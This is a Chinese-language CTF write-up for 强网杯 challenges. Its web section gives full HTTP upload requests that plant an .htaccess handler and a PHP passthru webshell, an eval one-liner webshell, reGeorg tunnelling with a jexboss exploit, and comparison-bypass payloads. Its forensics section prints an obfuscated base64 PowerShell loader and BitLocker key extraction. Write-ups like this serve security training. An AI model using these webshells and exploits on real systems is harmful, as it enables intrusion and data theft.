强网杯wp

easyweb

nmap 扫描端口
47.104.137.239
发现36842,访问，发现后台
后台存在注入，指定bool注入，跑出
admin
99f609527226e076d668668582ac4420

访问/file上传文件.htaccess

POST /file HTTP/1.1
Host: 47.104.137.239:36842
Content-Length: 208
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://47.104.137.239:36842
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryAbq3U5ic1kK1V2O6
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.101 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://47.104.137.239:36842/file
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: ci_session=kg0ug36qkaersvbp29j93hga0hh9mj5t; id=1; code=knfTTWuH4ucXw0f525hvrfWLmOVCt0GN
Connection: close

------WebKitFormBoundaryAbq3U5ic1kK1V2O6
Content-Disposition: form-data; name="file"; filename=".htaccess"
Content-Type: image/gif

AddHandler php5-script .cc
------WebKitFormBoundaryAbq3U5ic1kK1V2O6--

AddHandler php5-script .cc
解析后缀.cc文件

POST /file HTTP/1.1
Host: 47.104.137.239:36842
Content-Length: 205
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://47.104.137.239:36842
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryAbq3U5ic1kK1V2O6
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.101 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://47.104.137.239:36842/file
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: ci_session=kg0ug36qkaersvbp29j93hga0hh9mj5t; id=1; code=UEiNMA8J0k5edj3qmeCeiq7tSyicAyDu
Connection: close

------WebKitFormBoundaryAbq3U5ic1kK1V2O6
Content-Disposition: form-data; name="file"; filename="1.cc"
Content-Type: image/gif

<?php passthru($_POST['a']);
------WebKitFormBoundaryAbq3U5ic1kK1V2O6--

http://47.104.137.239:36842//upload//2482371bf22a0acc012ada5f980d5488//1.cc

写出一句话木马

a=echo "<?php eval(\$_POST[123213]);?>" > 1.php

使用蚁剑连接,查看发现jboss,上传reGeorg代理。使用exp对

http://172.17.0.2:8006/ jboos服务

代理出来，使用exp攻击获取flag

python reGeorgSocksProxy.py -p 8080 -u http://47.104.137.239:36842//upload//2482371bf22a0acc012ada5f980d5488//tunnel.nosocket.php

proxychains4 python jexboss.py -u http://172.17.0.2:8006/

cat /flag

寻宝

KEY1
伪协议 + md5截断对比
post请求
ppp[number1]=2e32%00&&ppp[number2]=2e32&ppp[number3]=61823470&ppp[number4]=asdasa1&ppp[number5]=“%00”

KEY1{e1e1d3d40573127e9ee0480caf1283d6}

KEY2
用迅雷下载压缩包
写了读docx一个匹配KEY脚本

import os
import docx
mydir = u'/Users/s8er/Downloads/five_month' # test的文件路径
for root,dirs,files in os.walk(mydir):
    for file in files: 
        if '.docx' in file: # 只查找txt文件
            path = os.path.join(root,file)
            file = docx.Document(path)
            #循环打印输出
            for f in file.paragraphs:
                if "KEY2{" in f.text:
                    print(f.text)
                # with open("data.txt",'a') as f:
                #     f.write(f.text)

填上KEY1和KEY2获取到flag

[强网先锋]赌徒

读取配置文件发现显示gam3.php
http://eci-2zeeeoa97hcahqft5vcr.cloudeci1.ichunqiu.com/gam3.php#

输入三次

Hard_Penetration

shiro 反序列化，写了webshell，查看端口发现内网有8005端口,写re代理，



找到源码
https://github.com/IsCrazyCat/demo-baocms-v17.1/
审计源码

可包含读取文件

杂项

BlueTeaming

查询镜像系统信息

python vol.py -f "memory.dmp" imageinfo

INFO    : volatility.debug    : Determining profile based on KDBG search...
          Suggested Profile(s) : Win7SP1x64, Win7SP0x64, Win2008R2SP0x64, Win2008R2SP1x64_24000, Win2008R2SP1x64_23418, Win2008R2SP1x64, Win7SP1x64_24000, Win7SP1x64_23418
                     AS Layer1 : WindowsAMD64PagedMemory (Kernel AS)
                     AS Layer2 : FileAddressSpace (/home/c3/Desktop/volatility/memory.dmp)
                      PAE type : No PAE
                           DTB : 0x187000L
                          KDBG : 0xf80002be3120L
          Number of Processors : 4
     Image Type (Service Pack) : 1
                KPCR for CPU 0 : 0xfffff80002be5000L
                KPCR for CPU 1 : 0xfffff88002f00000L
                KPCR for CPU 2 : 0xfffff88002f7e000L
                KPCR for CPU 3 : 0xfffff880009b1000L
             KUSER_SHARED_DATA : 0xfffff78000000000L
           Image date and time : 2020-11-26 13:00:41 UTC+0000
     Image local date and time : 2020-11-26 22:00:41 +0900

检测进程列表

python vol.py -f "memory.dmp" --profile=Win7SP1x64 pslist

查看历史执行命令

python vol.py -f "memory.dmp" --profile=Win7SP1x64 memdump -p 7092 -D /home/c3/Desktop/

使用010editor

@echo off;
for /f "tokens=*" %%a in ('reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Communication" /v code ^| find /i "REG_SZ"') do (
    set var="%%~a";
    powershell -noprofile "%var:~19,1500%;
)
for /f "tokens=*" %%a in ('reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Communication" /v code ^| find /i "REG_SZ"') do (
    set var="%%~a";
    powershell -noprofile "%var:~19,1500%;

python vol.py -f memory.dmp --profile=Win7SP1x64 printkey -K "Microsoft\Windows\Communication"

powershell -noprofile ( $veRBOsepReFErEncE.tOstrINg()[1,3]+'x'-JOin'')( nEW-ObjEcT sySTEm.iO.sTreaMReAdER( ( nEW-ObjEcT  SystEm.iO.CompreSsiOn.DEfLATEstREam([IO.meMoryStream] [CoNVeRT]::fROMbASe64StRinG('NVJdb5tAEHyv1P9wQpYAuZDaTpvEVqRi+5Sgmo/Axa0VRdoLXBMUmyMGu7Es//fuQvoAN7e7Nzua3RqUcJbgQVLIJ1hzNi/eGLMYe2gOFX+0zHpl9s0Uv4YHbnu8CzwI8nIW5UX4bNqM2RPGUtU4sPQSH+mmsFbIY87kFit3A6ohVnGIFbLOdLlXCdFhAlOT3rGAEJYQvfIsgmAjw/mJXTPLssxsg3U59VTvyrT7JjvDS8bwN8NvbPYt81amMeItpi1TI3omaErK0fO5bNr7LQVkWjYkqlZtkVtRUK8xxAQxxqylGVwM3dFX6jtw6TgbnrPRCMFlm75i3xAPhq2aqUnNKFyWqhNiu0bC4wV6kXHDsh6yF5k8Xgz7Hbi6+ACXI/vLQyoSv7x5/EgNbXvy+VPvOAtyvWuggvuGvOhZaNFS/wTlqN9xwqGuwQddst7Rh3AfvQKHLAoCsq4jmMJBgKrpMbm/By8pcDQLzlju3zFn6S12zB6PjXsIfcj0XBmu8Qyqma4ETw2rd8w2MI92IGKU0HGqEGYacp7/Z2U+CB7gqJdy67c2dHYsOA0H598N33b3cr3j2EzoKXgpiv1+XjfbIryhRk+wakhq16TSqYhpKcHbpNTox9GYgyekcY0KcFGyKFf56YTF7drg1ji/+BMk/G7H04Y599sCFW3+NG71l0aXZRntjFu94FGhHidQzYvOsSiOaLsFxaY6P6CbFWioRSUTGdSnyT8=' ) , [IO.coMPressION.cOMPresSiOnmOde]::dEcOMPresS)), [TexT.ENcODInG]::AsCIi)).ReaDToeNd()

CipherMan

python vol.py -f ciphermain/memory --profile=Win7SP1x86_23418 filescan |grep "Desktop"

python vol.py -f ciphermain/memory --profile=Win7SP1x86_23418 dumpfiles -Q 0x000000007e02af80 -D /home/c3/Desktop/

복구 키 ID: 168F1291-82C1-4B
전체 복구 키 ID: 168F1291-82C1-4BF2-B634-9CCCEC63E9ED

在使用工具解密

第二解法

$ fdisk -l Secret                                                         1 ⨯
Disk Secret: 512 MiB, 536870912 bytes, 1048576 sectors
Units: sectors of 1 * 512 = 512 bytes
Sector size (logical/physical): 512 bytes / 512 bytes
I/O size (minimum/optimal): 512 bytes / 512 bytes
Disklabel type: dos
Disk identifier: 0x1c5bcb0b

Device     Boot Start     End Sectors  Size Id Type
Secret1           128 1042559 1042432  509M  7 HPFS/NTFS/exFAT

$ hexdump -C -s $((512*128)) -n 16 Secret 

00010000  eb 58 90 2d 46 56 45 2d  46 53 2d 00 02 08 00 00  |.X.-FVE-FS-.....|
00010010

有-FVE-FS-，这样可以判断是否bitlocker锁
直接使用插件解bitlocker锁
https://raw.githubusercontent.com/elceef/bitlocker/master/bitlocker.py
可以从内存镜像⾥⾯读bitlocker key

python vol.py -f ciphermain/memory --profile=Win7SP1x86_23418 bitlocker
Address : 0x86863bc8
Cipher  : AES-128
FVEK    : 7c9e29b3708f344e4041271dc54175c5
TWEAK   : 4e3ef340dd377cea9c643951ce1e56c6

提取解密卷

sudo bdemount -k 7c9e29b3708f344e4041271dc54175c5:4e3ef340dd377cea9c643951ce1e56c6 -o $((512*128)) Secret 1

挂载

mount -o loop,ro 1/bde1 2